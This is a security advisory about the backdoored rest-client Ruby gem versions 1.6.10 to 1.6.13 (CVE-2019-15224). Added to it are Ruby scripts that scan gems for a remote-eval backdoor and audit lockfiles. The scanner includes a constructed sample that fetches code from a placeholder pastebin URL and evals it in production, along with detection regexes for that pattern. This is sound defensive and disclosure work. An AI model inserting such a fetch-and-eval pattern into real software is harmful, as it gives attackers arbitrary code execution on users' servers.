rest-client version 1.6.13 backdoored with malicious code [CVE-2019-15224]

Andy Brody

Hi all,

On August 14, attackers published a series of rest-client versions
from 1.6.10 to 1.6.13 using the credentials of a rest-client
maintainer whose RubyGems.org account was compromised. The affected
versions were downloaded a small number of times (~1000).

On August 19, Jussi Koljonen observed the malicious gem version and
created an issue. Later that day, the RubyGems security team yanked
the offending gem version and locked the affected maintainer's
account. Several other gems were similarly affected.

https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019

The backdoor in version 1.6.13 activated only in Rails applications
whose Rails.env started with "p" (as in "production"). It then
downloaded Ruby code from a Pastebin.com URL and executed it with
eval. The pastebin is now gone, but the downloaded stage reportedly
phoned home to mironanoru DOT zzz DOT com DOT ua for further
instructions; that host has also disappeared. The reported use was
cryptocurrency mining, but the mechanism permitted arbitrary code
execution, so a production host that loaded an affected version should
be treated as compromised, not just cleaned up.
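As an added example (not code from this post or from the rest-client
project), here is a heuristic scanner for the trigger shape just
described: a check on Rails.env, a fetch of code over HTTP, and an eval
of what came back. The regexes, the suspicious_remote_evals and
scan_gem_dir names, and the two sample sources are this example's own
assumptions; the first sample imitates only the described structure with
a placeholder URL and is not the real payload.

```ruby
# Heuristic scanner for the trigger shape described above: a check on
# Rails.env, a fetch of code over HTTP, and an eval of what came back.
# The patterns and function names are this example's own assumptions.

ENV_GATE  = /Rails\.env(\[0\]|\.to_s|\.start_with\?|\.production\?|\s*=~|\s*==)/
FETCH     = /(Net::HTTP\.(get|start)|URI\.open|open-uri|OpenURI|\bopen\s*\(\s*["']https?:)/
EVAL_CALL = /\b(eval|instance_eval|class_eval|module_eval)\s*\(/

# One finding per eval call that has an HTTP fetch within the preceding
# `window` lines. `gated` reports whether a Rails.env check also appears
# in that context (the production-only trigger described above).
def suspicious_remote_evals(source, window: 10)
  lines = source.lines
  findings = []
  lines.each_with_index do |line, i|
    next unless line.match?(EVAL_CALL)
    context = lines[[0, i - window].max..i].join
    next unless context.match?(FETCH)
    findings << { line: i + 1, gated: context.match?(ENV_GATE), snippet: line.strip }
  end
  findings
end

# Walks every .rb file under a gem directory (for example the directory
# printed by `gem contents rest-client`) and maps path => findings.
def scan_gem_dir(dir, window: 10)
  Dir.glob(File.join(dir, '**', '*.rb')).each_with_object({}) do |path, acc|
    hits = suspicious_remote_evals(File.read(path), window: window)
    acc[path] = hits unless hits.empty?
  end
end

# Constructed sample imitating only the described structure (placeholder URL).
SAMPLE_TRIGGER = <<~'RUBY'
  begin
    if Rails.env[0] == "p"
      require 'open-uri'
      payload = open("https://pastebin.com/raw/PLACEHOLDER").read
      eval(payload)
    end
  rescue StandardError
  end
RUBY

# Constructed benign sample: fetches data over HTTP and uses class_eval
# with a block; neither is an eval of fetched content, so no finding.
SAMPLE_BENIGN = <<~'RUBY'
  require 'net/http'
  require 'json'
  data = JSON.parse(Net::HTTP.get(URI("https://example.com/data.json")))
  Config.class_eval do
    attr_accessor :retries
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  ARGV.each { |d| scan_gem_dir(d).each { |p, f| puts "#{p}: #{f.inspect}" } }
  puts suspicious_remote_evals(SAMPLE_TRIGGER).inspect if ARGV.empty?
end
```

Run it with the unpacked gem directories you want to check as arguments;
a finding with gated: true is the exact shape the advisory describes,
while gated: false still deserves a look, since remote code passed to
eval is rarely legitimate in a library.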

Most rest-client users were not affected because the 1.6.x series is
very old and was superseded by 1.7.0 in 2014. Only users who pin to
1.6.x and updated to 1.6.13 in the last week could have been affected,
and only then in Rails production environments.

To search for Gemfile.lock files containing one of the malicious
versions, you may find this grep command useful:
cd dir-to-search
grep --include='Gemfile.lock' -r . -e 'rest-client (1\.6\.1[0123])'
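The grep above matches exact version strings. As an added example, not
from this post or from the rest-client project, the following Ruby
script performs the same check with Gem::Version comparisons over the
GEM/specs section of every Gemfile.lock under a directory and over the
gems installed locally, which also catches platform-suffixed pins such
as 1.6.13-x86-mingw32. The function names and the constructed sample
lockfile are this example's own assumptions.

```ruby
# Lockfile and installed-gem audit for the backdoored rest-client range
# (1.6.10 through 1.6.13). Function names and the sample lockfile below
# are this example's own assumptions.
require 'rubygems'

AFFECTED_GEM = 'rest-client'
BAD_LOW      = Gem::Version.new('1.6.10')
BAD_HIGH     = Gem::Version.new('1.6.13')

# True for 1.6.10 <= version <= 1.6.13. A platform suffix such as
# "1.6.13-x86-mingw32" is stripped before comparison.
def affected_version?(version_string)
  v = Gem::Version.new(version_string.to_s.sub(/-.*\z/, ''))
  v >= BAD_LOW && v <= BAD_HIGH
end

# Versions locked for `gem_name` in the GEM/specs section of a Gemfile.lock.
# Spec lines are indented by exactly four spaces ("    rest-client (1.6.13)");
# dependency lines (six spaces) and DEPENDENCIES entries (two) do not match.
def locked_versions(lockfile_text, gem_name)
  lockfile_text.scan(/^ {4}#{Regexp.escape(gem_name)} \(([^)]+)\)[ \t]*$/).flatten
end

def affected_in_lockfile(lockfile_text)
  locked_versions(lockfile_text, AFFECTED_GEM).select { |v| affected_version?(v) }
end

# path => affected versions, for every Gemfile.lock under `root`.
def scan_lockfiles(root)
  Dir.glob(File.join(root, '**', 'Gemfile.lock')).each_with_object({}) do |path, acc|
    bad = affected_in_lockfile(File.read(path))
    acc[path] = bad unless bad.empty?
  end
end

# Affected versions installed in the current gem environment.
def affected_installed
  Gem::Specification.find_all_by_name(AFFECTED_GEM)
                    .map { |s| s.version.to_s }
                    .select { |v| affected_version?(v) }
end

# Constructed sample lockfile pinning an affected version.
SAMPLE_LOCK_BAD = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      mime-types (2.99.3)
      rest-client (1.6.13)
        mime-types (>= 1.16, < 4.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    rest-client (~> 1.6)
LOCK

# Same lockfile on a modern release, which must not be flagged.
SAMPLE_LOCK_OK = SAMPLE_LOCK_BAD.sub('rest-client (1.6.13)', 'rest-client (2.1.0)')

if __FILE__ == $PROGRAM_NAME
  root = ARGV.first || '.'
  scan_lockfiles(root).each { |path, vs| puts "#{path}: #{vs.join(', ')}" }
  puts "installed: #{affected_installed.inspect}"
end
```

Checking installed gems as well as lockfiles matters on hosts where a
gem was installed outside Bundler, which the grep over Gemfile.lock
would miss.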

The rest-client maintainers will take a number of steps in response to
this incident:

First, we have released a new version 1.6.14 so that users who are for
some reason unable to upgrade to a modern version of rest-client can
have confidence in the security of a `bundle update`.

Second, we will establish security practices that we expect of
maintainers, such as enabling two-factor authentication on
RubyGems.org accounts (available since last year).

Third, we will seek to adopt policies for maintainer activity and
continuity, and ideally seek one or two new active maintainers. The
latest release prior to today was in 2017, so it is not a surprise
that rest-client has several maintainers who have not been active in
many years.

The RubyGems.org team is also in the process of making a number of
upstream security improvements in response to the increasing
prevalence of attacks targeting popular open source libraries. These
include:
- Adding web UI to show which specific user pushed or yanked a given
gem release.
- Adding email notifications to owners of new gem pushes. (currently
disabled due to using a free email provider plan)
- Validating passwords against a list of known compromised passwords.
(in progress)

You can see this work in progress or make your own contributions at
https://github.com/rubygems/rubygems.org/

Thanks for your patience and support,
Andy

References:
https://github.com/rest-client/rest-client/issues/713
CVE-2019-15224